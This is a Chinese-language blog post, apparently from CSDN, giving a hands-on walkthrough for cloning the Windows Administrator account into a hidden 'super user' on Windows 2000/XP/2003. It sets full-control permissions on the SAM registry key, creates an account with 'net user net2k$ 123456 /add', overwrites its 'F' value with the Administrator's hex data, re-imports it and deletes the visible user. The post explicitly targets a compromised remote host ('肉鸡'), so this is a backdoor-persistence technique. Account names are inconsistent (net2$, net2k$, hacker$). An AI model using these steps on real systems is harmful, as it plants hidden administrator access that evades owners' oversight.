手工建立超级隐藏用户

最新推荐文章于 2024-09-20 17:14:37 发布
最新推荐文章于 2024-09-20 17:14:37 发布
阅读量3.1k 收藏
点赞数
文章标签: 数据库 security user hex system manager
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/net2kc/article/details/171288
版权

   2K中的regedit.exe和regedt32.exe
    XP中的regedit.exe和regedt32.exe
    win2003中的regedit.exe和regedt32.exe
    都有两个注册表编辑器,实为一个程序。对regedit.exe我想大家都应该很熟悉的啦,但却不能对注册表的项键设置权限,而regedt32.exe最
大的优点就是能够对注册表的项键设置权限。nt/2000/xp/2003的帐户信息都在注册表的HKEY_LOCAL_MACHINE/SAM/SAM键下,但是除了系统用户
SYSTEM外,其它用户都无权查看到里面的信息。下面介绍一下这个sam
    SAM(Security Accounts Manager安全帐户管理器)负责SAM数据库的控制和维护。SAM数据库位于注册表HKLM/SAM/SAM下,受到ACL保护,
可以使用regedt32.exe打开注册表编辑器并设置适当权限查看SAM中的内容。SAM数据库在磁盘上就保存在%systemroot%system32/config/目录
下的sam文件中,在这个目录下还包括一个security文件,是安全数据库的内容,听高手说两者有不少关系。(由于本人太菜,并不太了解)
SAM数据库中包含所有组、帐户的信息,包括密码HASH、帐户的SID等。现以我分析的系统---中文Win2003 Server为例。(不好意思,因为我没
装2K:()
    首先用regedt32.exe(2003用regedit也一样)对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。展开注册
表HKEY_LOCAL_MACHINE_SAM:
|---- SAM
|----Domains
| |----Account
| | |---- Aliaese
| | | |---- 000003E8
| | | |----000003EA
| | | |----000003EA
| | | |---- Members
| | | | |----S-1-5
| | | | | |----000003EA
| | | | | |----00000013
| | | | | |----00000013
| | | | |----S-1-5-21-3179286488-61192537-2235348617
| | | | |----000003E9
| | | | |----000003ED
| | | |----Name
| | | |----HelpServicesGroup
| | | |----IIS_WPG
| | | |----TelnetClients
| | |----Grpup
| | | |----00000201
| | | |----Name
| | | |----None
| | |----Users
| | |----000001F4
| | |----000001F5
| | |----000003E9
| | |----000003EC
| | |----000003ED
| | |----Names
| | |----Net2k$
| | |----Guest
| | |----IUSR_NET2K-KAXXY6SZ3
| | |----IWAM_NET2K-KAXXY6SZ3
| | |----SUPPORT_388945a0
| |----Builtin
| |----Aliases
| | |----00000220
| | |----00000221
| | |----00000222
| | |----00000223
| | |----00000226
| | |----00000227
| | |----00000228
| | |----0000022B
| | |----0000022C
| | |----0000022E
| | |----0000022F
| | |----Members
| | | |----S-1-5
| | | | |----00000004
| | | | |----0000000B
| | | | |----00000014
| | | |----S-1-5-21-3179286488-61192537-2235348617
| | | |----000001F4
| | | |----000001F5
| | | |----000003EC
| | |----Names
| | |----Administrators
| | |----Backup Operators
| | |----Guests
| | |----Network Configuration Operators
| | |----Performance Log Users
| | |----Performance Monitor Users
| | |----Power Users
| | |----Print Operators
| | |----Remote Desktop Users
| | |----Replicator
| | |----Users
| |----Groups
| | |---Names
| |----Users
| |----Names
|----RXACT
这是我机器上注册表中SAM数据库的结构,SAM树。在整个数据库中,帐号主要内容存在于下面这些位置:在/Domains/下就是域(或本机)中的
SAM内容,其下有两个分支“Account”和“Builtin”。/Domains/Account是用户帐号内容。/Domains/Account/Users下就是各个帐号的信息。
其下的子键就是各个帐号的SID相对标志符。比如000001F4,每个帐号下面有两个子项,F和V。其中/Names/下是用户帐号名,每个帐号名只有
一个默认的子项,项中类型不是一般的注册表数据类型,而是指向标志这个帐号的SID最后一项(相对标识符),比如其下的Administrator,
类型为0x1F4,于是从前面的000001F4就对应着帐户名administrator的内容。如果我们把某个帐号中的类型改为0x1F4,那么这个帐号将被指向
类000001F4的帐户。而这个帐号000001F4就是administrator帐户,这样,系统在登录过程中就把被修改的帐号完全转为了administrator帐号,
经过修改的帐号所使用的所有内容、信息都是adminisrtator内容,包括密码、权限、桌面、记录、访问时间等等,这就是达到了所谓的克隆
超级管理员帐号的目的。由于本人水平所限,SAM数据库的不再多作介绍了,想要了解更多的,可以自己去查找资料.下面主要是介绍如何实现
这个克隆并隐藏帐号的步骤了。
    了解了这些,接下来的工作也就更容易去做了。
     具体步聚如下:
     1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:
net2$,这里我在命令行下建立这个帐户,如下:
net user net2k$ 123456 /add
    2、在“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。
打开键:HKEY_LOCAL_MAICHINE/SAM/SAM/Domains/account/user/names/net2k$"
   3、将项net2$、000003F2、000001F4导出为kelong.reg、3f2.reg、admin.reg,用记事本分别把这几个导出的文件进行编辑,将超级用户对
应的项000001F4下的键"F"的值复制,并覆盖NET2K$对应的项000003F2下的键"F"的值,详细步骤、内容如下:
项000001F4下的键"F"的内容:
"F"=hex:02,00,01,00,00,00,00,00,58,35,e6,ba,b7,85,c4,01,00,00,00,00,00,00,00,/
  00,6a,09,b0,b2,6f,71,c4,01,00,00,00,00,00,00,00,00,32,47,ec,f7,5c,84,c4,01,/
  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,86,00,01,00,00,00,00,/
  00,00,00,00,00,00,00
帐号NET2K$对应的SID项000003F2下的键"F"的内容:
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,/
  00,ce,21,90,ca,eb,85,c4,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,/
  f2,03,00,00,01,02,00,00,10,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,/
  00,00,00,00,00,5f,00
然后再将03F2.reg与kelong.reg合并后执行导入。
    4、在命令行下执行net user net2k$ /del将用户net2k$删除:net user net2k$ /del
    到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE/SAM/SAM键权限改回原
来的样子。
    注意:隐藏的超级用户建好后,在帐户管理器看不到net2k$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,
就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,据说不能删除,我倒
没试过。至于如何在命令行下远程建立隐藏的超级用户,这里就不多说了,只要你dos命令好,手工克隆也完全不是问题,方法都一样,只是要
讲究操作技巧了……
    呵呵,从下午5点多开始写这篇文章,到现在已经是晚上21:20分了,腰都酸了,累,洗澡去了……^_^
    


 

net2kc
关注
手工备份Windows的注册表
07-24
除了上述方法,还可以借助第三方软件,如“超级魔法兔子”、“Windows优化大师”、“Tweak”等工具,它们通常提供一键备份和恢复功能,简化了操作流程。 【手工恢复注册表】 恢复Windows 2000/xp的注册表,可以...
手工实战Rootkit木马.pdf
05-19
1. **用超级巡警检测隐藏的驱动和服务**:首先利用超级巡警扫描系统,查找隐藏的服务和驱动文件,以便后续进行针对性的清除操作。 2. **用XDelBox进行驱动文件删除**:确定恶意驱动的具体位置后,使用XDelBox安全...
自己手工做文件夹加密
04-26
总的来说,手工制作的“超级”加密文件夹是一种简易的隐私保护措施,适用于对安全性要求不高的情况。如果你需要更高级别的保护,例如密码保护和数据加密,建议使用专门的文件加密软件,它们通常提供更强大的安全功能...
兴趣探索者「Interests Explorer」-crx插件
03-18
发现隐藏和高转换Facebook的利益 >>>>世界上第一个本地Facebook兴趣引擎! <<<< ************ VER 0.7 ************************************ *************>更精确地定位您的Facebook...
系统还原减肥三板斧.docx
09-27
可以找到保存还原点的文件夹,打开后就会见到一个隐藏文件夹,如"_restore{299846DD-6F80-45EF-9DC5-5E2A107D84B1}"。然后可以删除系统创建的还原点,保留自己认为有用的还原点。但需要注意的是,删除之前必须首先以...
4.网络编程
weixin_45476535的博客
09-14 586
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
Redis的Key的过期策略是怎样实现的?
daydayup
09-19 558
在学习Redis时,我们知道可以设置Key的过期时间,我们还知道,Redis一大特点–。那么当Redis中的数据量起来时,如果直接遍历所有的Key,那么对于Key过期时间的校验应该很费时间,那么Redis究竟是怎样做的呢?本文就来探讨关于Redis中的Key的过期册策略。Redis中的过期策略有两种。
Java项目: 基于SpringBoot+mybatis+maven课程答疑系统(含源码+数据库+毕业论文)
weixin_43860634的博客
09-14 849
Java项目: 基于SpringBoot+mybatis+maven课程答疑系统(含源码+数据库+毕业论文)
阿里1688一面总结
weixin_44804108的博客
09-19 220
发布-订阅模式,即当实验发生变更时,就发出一个变更事件,然后,每台机器感知到这个变更事件后,清空本地缓存,触发reload操作。为了避免大量请求打到DB,可以对查询请求进行加锁,保证相同的实验只有一个线程去查,然后更新到缓存中,其他的请求,走缓存查询结果。运维团队将扩缩容事件投递在kafka中,容量平台起一个线程去订阅变更事件,当有事件时,更新公共缓存中的数据。kafka单broker的消息是可以保证顺序性的,但是kafka集群的消息实际是无序的。首先,面试官进行对业务进行介绍,然后,候选人进行自我介绍。
No operations allowed after statement closed
最新发布
abments的博客
09-20 495
错误信息:参考解决方案 https://github.com/alibaba/druid/issues/5549如果修改socket-timeout不生效,可以尝试修改 socketTimeout。
MySQL数据库
kyrie_jie的博客
09-19 2106
1、计算机的资源有限,不可能把数据全部存储在内存中,且内存掉电后数据会丢失,为了能让程序在关机重启后继续使用,必须把数据保存到磁盘的文件中。2、随着程序的功能越来越复杂、数据量越来越大,从文件中读写数据需要大量的重复性操作,从文件中读取出指定的数据需要复杂的逻辑。3、不同的程序它的访问文件的操作不同,就意味着读写文件的代码无法复用。4、所以程序员非常需要一个统一的快速的访问磁盘数据的工具。
大批量查询方案简记(Mybatis流式查询)
kay'blog
09-20 695
介绍使用mybatis流式查询解决大数据量查询问题.
redis学习笔记(六)
小柒的博客
09-20 446
redis学习笔记(六)
110个oracle常用函数总结
m516387177的博客
09-12 1128
nvl2 (expr1, expr2, expr3) ->expr1不为null,返回expr2;为null,返回expr3。nvl(expr1, expr2)->expr1为null,返回expr2;不为null,返回expr1。求最大值,all表示对所有的值求最大值,distinct表示对不同的值求最大值,相同的只取一次。求最小值,all表示对所有的值求最小值,distinct表示对不同的值求最小值,相同的只取一次。nullif (expr1, expr2) ->相等返回null,不等返回expr1。
基于python+django+vue的旅游网站系统
计算机学姐的博客
09-17 1970
【2025最新】基于协同过滤+python+django+vue+MySQL的旅游网站系统,前后端分离。
mycat双主高可用架构部署-ER表
龙哥·三年风水从2011年开始做IT工作,从ps画图到前端开发->后端开发->框架开发->业务架构设计及开发->业务需求整理、开发->技术经理->技术总监
09-18 235
mycat双主高可用架构部署-ER表-MySQL5.7
linux环境下手动安装mysql
weixin_45583482的博客
09-14 977
没想到兜兜转转这么些年,今天申请个云服务器用来搭建求生2服务器,先用mysql来测试,结果还是花了相当久的时间。基本所有单节点部署应用到linux环境,都三个流程:1 下载安装包2 解压修改配置文件3 运行启动脚本我们按这个流程来说我遇到并解决的问题 ,如果你在过程中遇到什么问题,也请先暂停你的启动流程,移步到最下面的内容,看看是否有和你遇到一样的问题,解决以后继续。
Redis系列---Redission分布式锁
lipviolet的博客
09-20 668
两者都是阻塞加锁, 前者会一直阻塞,相应的该方法不存在返回值,因为无意义;后者可以传入一个等待时间,等待时间内持续阻塞,相应的该方法存在返回值,因为要确认是否成功加了锁。根据业务场景自己判断使用哪种锁,二者其实相似,trylock就是lock的进阶,加了一个等待时间而已。无论是redission还是redis的setNx,只要是锁,都必须有加锁和释放锁两个动作,二者缺一不可,并且需要把释放锁放到final中,这样可以保证锁一定被释放。然而,虽然看门狗机制设计得很好,但在某些极端情况下,仍然可能出现死锁。
postgres_fdw访问存储在外部 PostgreSQL 服务器中的数据
不会编程的猫星人
09-14 1359
postgres_fdw访问存储在外部 PostgreSQL 服务器中的数据
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值